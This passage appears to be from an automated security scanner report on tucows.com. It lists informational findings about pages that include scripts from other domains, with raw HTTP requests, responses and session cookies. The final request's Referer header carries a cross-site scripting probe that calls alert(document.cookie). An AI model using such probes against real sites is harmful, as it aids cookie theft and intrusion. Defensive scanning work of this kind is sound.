<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.13. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.14. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.15. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.16. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.17. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.18. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.19. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.20. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.21. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.22. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.23. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.24. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.25. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
